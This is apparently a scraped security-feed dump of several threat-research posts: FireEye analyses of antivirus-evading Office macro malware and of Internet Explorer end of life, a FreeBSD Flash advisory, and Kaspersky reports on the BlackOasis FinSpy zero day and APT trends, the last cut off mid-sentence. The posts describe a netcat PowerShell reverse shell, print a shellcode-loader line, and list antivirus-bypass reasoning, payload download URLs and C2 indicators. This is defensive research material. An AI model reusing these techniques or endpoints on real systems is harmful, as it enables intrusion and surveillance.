95e89fd65a63e8442dcf06d4e768e8f1 **\\- Doc1.docm\n\nType: DOCM \nDescription: VBA + PowerShell + Netcat as Backdoor \nAttribution: None \nCurrent detection: 0/53 \nFirst Submission: June 19, 2015 \nLast Submission: January 26, 2016 \nTime undetected in VT: At least 7 months\n\nThe word document comes with a simple message shown in Figure 20.\n\n\n\nFigure 20: Message distractor\n\nWhen the VBA macro is executed (see Figure 21), PowerShell code is loaded from the document\u2019s comments (see Figure 22):\n\n\n\nFigure 21: Loading malicious code\n\n\n\nFigure 22: Code embedded in the document comments\n\nThe PowerShell script will act as a backdoor to allow remote access to the compromised machine. The script will download and execute netcat to listen on IP 192.168.52.129 and port 3724. Once a connection is received, a PowerShell shell will be sent (via \u2013e powershell.exe option) to the client (PowerShell Reverse shell) as shown in Figure 23.\n\n\n\nFigure 23: Malicious code content\n\nIt is interesting to note that attackers are moving from traditional command prompt shells (cmd.exe) to PowerShell shells (powershell.exe), which are actually more powerful. For example, PowerShell allows the use of WMI (Windows Management Instrumentation), something not readily accessible via the standard command prompt[12].\n\nThe script references a non-routable (RFC1918) IP address, so we suspect that the script was either a proof of concept or meant to be used during the lateral movement phase in a specific internal environment that uses this IP space.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the .docm extension may evade extension-based parsers.\n\n2\\. Embedding the PowerShell script in the document\u2019s comments and executing it from a VB macro adds another layer of complexity. While this is clearly a suspicious behavior, it is not properly identified by signature-based detection.\n\nWe identified several other examples of malware using VBA Macros with PowerShell to mainly run shellcode loaders that allow attackers to gain remote access to victims\u2019 machines. Another example is shown below; it has two VT detections, but serves as an example of a very common variant seen in the wild.\n\n**9\\. 8de1ebacb72f3b23a8235cc66a6b6f68** \u2013 Polnoe_raspisanie_igr.xlsm\n\nType: XLSM \nDescription: VBA Macro + PowerShell \u2013 Shellcode Loader \nAttribution: None \nCurrent detection: 2/54 \nFirst Submission: October 14, 2015 \nLast Submission: January 28, 2016 \nTime undetected: 3.5 months with two generic detections\n\nWhen the Excel document is opened, a message is displayed in Russian. The user is even provided with a link to a legitimate article describing how to enable macros (see Figure 24).\n\nFigure 24: Excel file with legitimate link\n\nWhen the VBA Macro runs, it executes a PowerShell script that Base64-decodes and decompresses a second-stage PowerShell Script that will be used as the shellcode loader in memory (see Figure 25).\n\nFigure 25: PowerShell script being built on the fly via VB script\n\nPowerShell uses the Invoke-Expression (or IEX) call to execute the decompressed string, similar to the eval() functionality from other programming languages.\n\nThe Shellcode in this case comes hardcoded in the second stage PowerShell script, loaded and executed from memory with the following syntax:\n\n$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000\n\nWhere $x contains the Shellcode loaded in memory that eventually will connect to the domain spl[.]noip[.]me. Based on DNSDB query, the domain **spl[.]noip[.]me **previously resolved to Russian IP 81.23.177.72.\n\nMost of the VBA Macro + PowerShell scripts we identified were created with the macro_safe.py[13] and unicorn.py[14] scripts, often used for penetration testing.\n\n**Potential AV bypassing reason**\n\n1\\. The .xlsm extension may bypass extension-based parsers\n\n2\\. Using the VBA Macro in the first stage to build the first PowerShell script via concatenation provides an easy way to bypass signature-based detection\n\n3\\. The PowerShell scripts are Base64 encoded and compressed\n\n**10\\. cda305a6a6c6ace02597881b01a116e3 - **CVE-2013-1331-doc.docx\n\nType: DOCX \nDescription: Office Downloader \nAttribution: None \nCurrent detection: 0/55 \nFirst Submission: January 12, 2015 \nLast Submission: January 16, 2016 \nTime undetected in VT: The whole year and counting!\n\nIn 2013, a stack-based buffer overflow triggered while parsing PNG images was exploited in the wild against MS Office 2003 and Office for Mac. CVE-2013-1331 was assigned to the vulnerability.\n\nThe malicious samples did not include the PNG directly embedded in the document; rather, the PNG file was loaded from the Internet by using the INCLUDEPICTURE option[15].\n\nThis new sample uses a different option from the new XML Format called \u201cRelationships\u201d in order to download a resource from the Internet, as seen at Figure 26.\n\n\n\nFigure 26: XML content loading the PNG image remotely\n\nThe same domain was used back in 2013, but now with a different download technique. Although the vulnerability has been patched by Microsoft, the aforementioned technique can be used to download any resource from the Internet.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the XML \u2018Relationship\u2019 instead of the original INCLUDEPICTURE method to download resources from the Internet is a novel technique that may not be recognized.\n\n2\\. Based on the code shown above, it is clear that the intention is not to download a .gif image but a .php resource. Signature-based engines should easily detect the unusual resource name with multiple dots.\n\n##### **Conclusion**\n\nThreat actors of all types continue to improve their techniques to compromise organizations and remain undetected within an environment. Our study identified a number of techniques that successfully bypassed many AV engines:\n\n1\\. Alternate techniques to embed objects within Office documents that may not be recognized by AV engines.\n\n2\\. The use of a multi-stage infection approach in order to look unsuspicious at each stage:\n\na. A document downloading an image from the Internet that cannot be flagged as malicious at that stage \nb. A VBA Macro script loading malicious content from spreadsheet cells\n\n3\\. Multiple techniques to load malicious content from Office documents:\n\na. Embedded as ActiveX \nb. Embedded as OLE Binary \nc. Embedded in the document\u2019s comments \nd. Embedded in the spreadsheet cell\n\n4\\. Standalone packed binaries containing malicious Python scripts.\n\n5\\. Multi-layer Packing: RLPack + Custom UPX.\n\n6\\. The combination of multiple scripting languages to allow the attackers to obfuscate malicious code, such as VBA Script building malicious PowerShell scripts.\n\nIn several cases we note that the attackers are reusing known exploits (such as CVE-2015-5119 or CVE-2013-1331), but changing the delivery method; or leveraging obfuscation, encoding, encryption, or multiple layers of packing to disguise their malicious scripts or backdoors.\n\nFor proper detection, it is essential to monitor an attack through its entire life cycle \u2013 not simply when a suspicious document or file first enters a network. This approach is necessary to detect and block multi-stage infection strategies. While initial events (such as the delivery of a macro-enabled spreadsheet) may appear innocuous, eventually a later stage of the attack will trigger detection.\n\nIt is much easier to stop an attack \u2013 including a multi-stage attack \u2013 when it first occurs, to include detecting known and unknown exploits (zero days), or even threats that require user interaction such as macros inside documents.\n\nThis detection approach is the core logic behind FireEye Multi-Vector Virtual Execution (MVX) technology.\n\n##### **APPENDIX**\n\n**Indicators of Compromise - IOCs**\n\n**Network Based:**\n\n**4b3858c8b35e964a5eb0e291ff69ced6**\n\nPOST /0000/a242550.asp \nIP: 220.128.223.75 \nTCP Port: 8080 \n\n**4e51143b01e99afc3bd908794d81d3cb**\n\nGET /bbs/file/machinery/machine_body.jpg \nIP: cncauto.co.kr \nPORT: 80\n\n**8de1ebacb72f3b23a8235cc66a6b6f68**\n\nIP: spl.noip.me \nTCP Port: 80\n\n**b1f43ca11dcf9e60f230b9d6d332c479**\n\nIP: 31.168.144.18 \nTCP Port: 443\n\n**aedd5d8446cc12ddfdc426cca3ed8bf0**\n\nIP: 84.11.146.62 \nTCP Port: 13661\n\n**497eddab53c07f4be1dc4a8c169261a5**\n\nGET /ocagnt/gethooks.asp \nIP: 94.70.155.253 \nTCP Port: 80 \nGET /ocagnt/enckeys \nIP: 94.70.155.253 \nTCP Port: 80 \nGET /ocagnt/getstatus.asp \nIP: 94.70.155.253 \nTCP Port: 80\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd**\n\nIP: dennyhacker.no-ip.org \nTCP Port: 81\n\n**Host-Based:**\n\ndc15336e7e4579c9c04c6e4e1f11d3dd\n\nC:\\Windows\\System32\\install\\server.exe (copy of dropped binary) d409dc7e1ca0c86cb71e090591f16146\n\n%AppData%\\Local\\Temp\\XX--XX--XX.txt\n\nMutex created: \n_x_X_PASSWORDLIST_X_x_ \nx_X_BLOCKMOUSE_X_x_ \n***MUTEX*** \n***MUTEX***_PERSIST\n\n**497eddab53c07f4be1dc4a8c169261a5**\n\nc:\\octemp001\\ \nC:\\octemp001\\enccmdresults.txt \nC:\\octemp001\\ikeycharvalue.txt \nC:\\octemp001\\enchostnameres.txt \nC:\\octemp001\\certutil.txt \nC:\\octemp001\\cert.txt \nC:\\octemp001\\commands.txt \nC:\\octemp001\\prevcommands.txt \nC:\\octemp001\\enccmdresults.txt \nC:\\octemp001\\enccmdresults2.txt \nc:\\octemp001\\key.txt\n\nFigure 27 shows the MD5s with zero detection detailed on this report.\n\n\n\nFigure 27: 2015 samples from VT with zero detections in 2016\n\nSome exceptions to this study were added for samples with low detection rates, but with only generic detection (that is, not detected as part of any specific code family), that used an interesting technique or that were suspected of being used by an APT group (see Figure 28).\n\n\n\nFigure 28: Samples with low and / or generic detection\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd** \u2013 Brazilian RAT\n\nSome interesting commands from the RAT in Portuguese language:\n\n0002A3A8: pingtest \n \n--- \n \n0002A3BC: tentarnovamente \n \n0002A3E0: mouseposition \n \n0002A3F8: keyboardkey \n \n0002A40C: webcaminactive \n \n0002A424: webcamgetbuffer \n \n0002A43C: webcam \n \n0002A44C: desktop \n \n0002A45C: stopsearch \n \n0002A470: listarvalores \n \n0002A488: maininfo \n \n0002A49C: configuracoesdoserver \n \n0002A4BC: disconnect \n \n0002A4D0: uninstall \n \n0002A4E4: renameservidor \n \n0002A4FC: enviarexecnormal \n \n0002A518: enviarexechidden \n \n0002A534: executarcomandos \n \n0002A550: openweb \n \n0002A560: downexec \n \n0002A574: resumetransfer \n \n0002A58C: listardrives \n \n0002A5A4: listararquivos \n \n0002A5BC: execnormal \n \n0002A5D0: execinv \n \n0002A5E0: deletardir \n \n[1] Hangul Word Processor is a word processing application developed by South Korean software firm Hancom. \n[2] http://www.securityweek.com/zero-day-exploits-leaked-hacking-team-breach \n[3] https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html \n[4] https://msdn.microsoft.com/en-us/library/dd942138.aspx \n[5] An XLSB file is stored in binary format instead of the normal XML format, allowing the file to be read from and written to much faster. See https://technet.microsoft.com/en-us/library/dd797428.aspx \n[6] http://asec.ahnlab.com/1035 \n[7] https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf \n[8] http://www.pcworld.com/product/997528/rlpack-basic-edition.html \n[9] https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-could-the-curious-case-of-cz-solution.html \n[10] Py2Exe is a distutils extension to create standalone windows programs from python scripts. See https://sourceforge.net/projects/py2exe/. \n[11] https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb \n[12] http://www.howtogeek.com/163127/how-powershell-differs-from-the-windows-command-prompt/ \n[13] https://github.com/khr0x40sh/MacroShop/blob/master/macro_safe.py \n[14] https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py \n[15] http://blogs.technet.com/b/srd/archive/2013/06/11/ms13-051-get-out-of-my-office.aspx\n", "modified": "2016-04-13T09:00:00", "published": "2016-04-13T09:00:00", "href": "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", "id": "FIREEYE:C106464BCA41AB0D5AF6965D9907C8C3", "type": "fireeye", "title": "Ghosts in the Endpoint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "description": "Microsoft has started the year with an [announcement](<https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support>) that, effective Jan. 12, 2016, support for all older versions of Internet Explorer (IE) will come to an end (known as an EoL, or End of Life). The affected versions are Internet Explorer 7, 8, 9, and 10.\n\nWhat this means for users is that Microsoft will no longer release new security updates for these product versions going forward. This gives users two options: Internet Explorer 11 and Microsoft Edge, the latter of which is currently exclusive to Windows 10. If users would like to keep their browsers up to date, they will need to upgrade to either of these two options.\n\nIt should go without saying that Internet Explorer users are strongly encouraged to update to the latest version. It offers improved security with the latest security features and mitigations. Two notable mitigations introduced to the browser in 2014 are Isolated Heap and Memory Protect, which were implemented on Patch Tuesday of June and July 2014 respectively. Prior to that, Microsoft made a similar announcement about the Windows XP Operating System, wherein they issued an End of Life for XP in April 2014.\n\nThese are all steps in right direction for the Microsoft teams because it allows for the consolidation of team efforts, resulting in a stronger focus on securing fewer versions across a smaller code base. Microsoft continues to silently enhance protections as the months go by while at the same time trimming code.\n\nFigure 1 shows the vulnerability counts for Internet Explorer versions in 2015.\n\n\n\nFigure 1. Internet Explorer vulnerability count for 2015 [1]\n\nThe graph above shows the total number of reported vulnerabilities affecting each version of Internet Explorer across the months of 2015. Keeping in mind that these are non-unique counts, we can observe that, for the most part, the majority of the reported vulnerabilities affected Internet Explorer 11.\n\nFigure 2 shows the most notable in the wild (ITW) attacks exploiting Internet Explorer in 2014 and 2015.\n\nYear\n\n| \n\nCVE\n\n| \n\nAffects \n \n---|---|--- \n \n2014\n\n| \n\n[CVE-2014-0322](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>)\n\n| \n\nIE 9 and 10 \n \n2014\n\n| \n\n[CVE-2014-1776](<http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html>)\n\n| \n\nIE 6 to 11 \n \n2015\n\n| \n\n[CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>)\n\n| \n\nIE 10 and 11 \n \n2015\n\n| \n\n[CVE-2015-2502](<http://krebsonsecurity.com/2015/08/microsoft-pushes-emergency-patch-for-ie/>)\n\n| \n\nIE 7 to 11 \n \nFigure 2. ITW attacks of Internet Explorer [1]\n\nThe majority of the attacks found ITW in 2014 and 2015 affected IE 11.\n\nFigure 3 compares the count of vulnerabilities that affect Internet Explorer 11 (IE 11) to the ones that don\u2019t.\n\n\n\nFigure 3. IE11 vs. Non-IE11 vulnerability count [1]\n\nBased on the information found in Figures 1, 2, and 3, most of the vulnerabilities reported in 2015 affected Internet Explorer 11. This shows that attackers, as well as researchers, are focusing considerably on Internet Explorer 11. Microsoft\u2019s most recent move will allow the company to do the same.\n\nIt should be noted that, as of Internet Explorer 11, some features are no longer supported or are considered deprecated. These include, but are not limited to, [VML](<https://msdn.microsoft.com/en-us/library/hh801223\\(v=vs.85\\).aspx>) and [VBScript](<https://msdn.microsoft.com/en-us/library/dn384057\\(v=vs.85\\).aspx>), which have been used to [exploit](<http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php>) and [compromise](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) the integrity of Internet Explorer, or leveraged to bypass ASLR/DEP in the past. This is a strong move in the right direction, as trimming the code base leads to shrinking the attack surface. This helps secure products such as Internet Explorer.\n\nIt is also worth noting that at this point no ITW attacks have been observed against Microsoft Edge, the new web browser that currently ships exclusively with Windows 10. Microsoft Edge also follows the same approach of removing unnecessary features such as ActiveX and Browser Helper Objects, as well as [others](<https://blogs.windows.com/msedgedev/2015/05/06/a-break-from-the-past-part-2-saying-goodbye-to-activex-vbscript-attachevent/>).\n\nIn conclusion, after Jan. 12, 2016, older Internet Explorer users will be exposed to vulnerabilities that may be exploited by malware and targeted by Exploit Kits. The best way to defend against this is to keep your browser up to date by upgrading to Internet Explorer 11 or using Microsoft Edge.\n\n[1] Microsoft Security Bulletins: <https://technet.microsoft.com/en-us/library/security/dn610807.aspx>\n", "modified": "2016-01-12T14:49:00", "published": "2016-01-12T14:49:00", "href": "https://www.fireeye.com/blog/threat-research/2016/01/end_of_life_for_ie.html", "id": "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "type": "fireeye", "title": "End of Life for Internet Explorer 8, 9 and 10", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:38", "bulletinFamily": "unix", "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player. These\n\t updates address critical vulnerabilities that could potentially\n\t allow an attacker to take control of the affected system. Adobe is\n\t aware of a report that an exploit targeting CVE-2015-5119 has been\n\t publicly published.\n\t \n\n", "modified": "2015-07-07T00:00:00", "published": "2015-07-07T00:00:00", "id": "348BFA69-25A2-11E5-ADE1-0011D823EEBD", "href": "https://vuxml.freebsd.org/freebsd/348bfa69-25a2-11e5-ade1-0011d823eebd.html", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2017-10-16T15:16:55", "bulletinFamily": "blog", "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)So far only one attack has been observed in our customer base, leading us to believe the number of attacks are minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&amp;C server. Although the exact payload of the attack was no longer in the C&amp;C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-1.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-2.png>)Decoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-3.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-4.png>)**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-5.png>)**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-6.png>)NOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-7.png>)**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-8.png>)**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE it will look like the following:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-9.png>)**Unpacked PCODE**\n\nAfter unpacking the virtual machine PCODE is then decrypted:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-10.png>)**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-11.png>)**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legit binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-12.png>)**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here will continue to grow.\n\nWhat does it mean for everyone and how to defend against such attacks, including zero-day exploits?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as well against this threat by one of the following detections:&lt;/p style=\"margin-bottom:0!important\"&gt;\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "modified": "2017-10-16T14:28:47", "published": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T03:16:10", "bulletinFamily": "blog", "description": "\n\n## Introduction\n\nSince 2014, Kaspersky Lab's Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first pushed to our subscriber base. At the same time, to remain true to our efforts to help make the internet safer, important incidents, such as WannaCry or Petya are covered in both private and public reports.\n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-1.png>)\n\nKaspersky's Private Threat Intelligence Portal (TIP)\n\nIn Q1 of 2017 we published our [first APT Trends report](<https://securelist.com/apt-trends-report-q1-2017/78169/>), highlighting our top research findings over the last few months. We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: **intelreports@kaspersky.com**.\n\n## Russian-Speaking Actors\n\nThe second quarter of 2017 has seen multiple incidents involving Russian-speaking threat actors. Topping the list of 'attention grabbers' were the Sofacy and Turla threat actors.\n\nMarch and April started off with a bang, with the discovery of three zero-day exploits being used in-the-wild by Sofacy and Turla: two of these targeted Microsoft Office's Encapsulated PostScript (EPS) and the third being a Microsoft Windows Local Privilege Escalation (LPE). Sofacy was discovered utilizing both CVE-2017-0262 (an EPS vulnerability) and CVE-2017-0263 (LPE) over the Easter holiday, targeting a swath of users throughout Europe. Prior to this attack, Turla was also discovered using CVE-2017-0261 (a different EPS vulnerability). Neither actor appeared to deviate from their usual payload repertoire, with Sofacy dropping their typical GAMEFISH payload and Turla utilizing what we refer to as ICEDCOFFEE (a.k.a. Shirime). Targeting for these attacks was also directly within the normal wheelhouse for both actors, focusing mainly on foreign ministries, governments, and other government-affiliated organizations.\n\nGReAT produced additional reports on Sofacy and Turla beyond those mentioned above. In April, we notified customers of two new experimental macro techniques utilized by Sofacy. These techniques, while not particularly sophisticated, caught our attention as they had not been seen before in-the-wild. The first technique involved using the built-in 'certutil' utility in Microsoft Windows to extract a hardcoded payload within a macro. The second technique involved embedding Base64-encoded payloads within the EXIF metadata of the malicious documents. While the targeting for this new set of activity was again fairly standard, we discovered some noteworthy targeting against a French political party member prior to the 2017 elections. Moving into May and June, we wrote two additional reports of interest involving these two actors: the first was an update on the long running \"Mosquito Turla\" campaign showing the usage of fake Adobe Flash installers and continued targeting of foreign Ministries. The other documented yet another update on Sofacy's unique Delphi payload we call 'Zebrocy'.\n\nJune saw the massive outbreak of a piece of malware [dubbed](<https://securelist.com/schroedingers-petya/78870/>) \"ExPetr\". While initial assessments presumed that this was yet another ransomware attack \u00e0 la WannaCry, a deeper assessment by GReAT places the initial intent as constituting an operation destructive in nature. We were also able to confidently identify the initial distribution of the malware, as well as indicate a _low confidence _assessment that the attacks may share traits with the BlackEnergy actors. \n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-2.png>)\n\nBelow is a summary of report titles produced for the Eastern European region only. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to **intelreports@kaspersky.com**.\n\n 1. Sofacy Dabbling in New Macro Techniques\n 2. Sofacy Using Two Zero Days in Recent Targeted Attacks - early warning\n 3. Turla EPS Zero Day - early warning\n 4. Mosquito Turla Targets Foreign Affairs Globally\n 5. Update on Zebrocy Activity June 2017\n 6. ExPetr motivation and attribution - Early alert\n 7. BlackBox ATM attacks using SDC bus injection\n\n## English-Speaking Actors\n\nEnglish-speaking actors are always particularly fascinating due to their history of complex tooling and campaigns. Actors like Regin and Project Sauron have proven fascinating examples of new techniques leveraged in long-lasting, hard to catch campaigns and as such make ideal subjects for further research. Not to be outdone, Equation and the Lamberts were the subjects of our most recent investigations.\n\nContinuing our practice of conducting malware paleontology while integrating new discoveries, we published a report on EQUATIONVECTOR, an Equation backdoor first used as early as 2006. This backdoor is a fascinating passive-active shellcode staging implant. It's one of the earliest noted instances of a NObody But US ('NOBUS') backdoor for staging further attacks. Despite its age, the EQUATIONVECTOR backdoor (identified as 'PeddleCheap' in the latest ShadowBrokers disclosures) incorporates many advanced techniques for prolonged stealthy operations in victim networks, allowing the Equation operators to deliver further payloads without arousing suspicion. The report tracks the development of these tools through subsequent iterations year-by-year.\n\nOur tracking of the Lamberts toolkit continues with the publication of the Gray Lambert report in June, the most advanced Lambert known to date. This too is a NOBUS backdoor, a passive 